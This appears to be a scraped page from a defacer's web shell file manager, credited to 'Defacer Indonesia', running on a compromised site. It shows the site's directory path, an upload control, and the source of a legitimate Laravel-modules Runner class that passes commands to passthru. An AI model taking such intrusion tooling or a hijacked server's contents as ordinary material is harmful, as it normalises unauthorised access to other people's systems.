whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
nwidart
/
laravel-modules
/
src
/
Process
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/nwidart/laravel-modules/src/Process/Runner.php
<?php namespace Nwidart\Modules\Process; use Nwidart\Modules\Contracts\RepositoryInterface; use Nwidart\Modules\Contracts\RunableInterface; class Runner implements RunableInterface { /** * The module instance. * @var RepositoryInterface */ protected $module; public function __construct(RepositoryInterface $module) { $this->module = $module; } /** * Run the given command. * * @param string $command */ public function run($command) { passthru($command); } }
Copyright ©2021 || Defacer Indonesia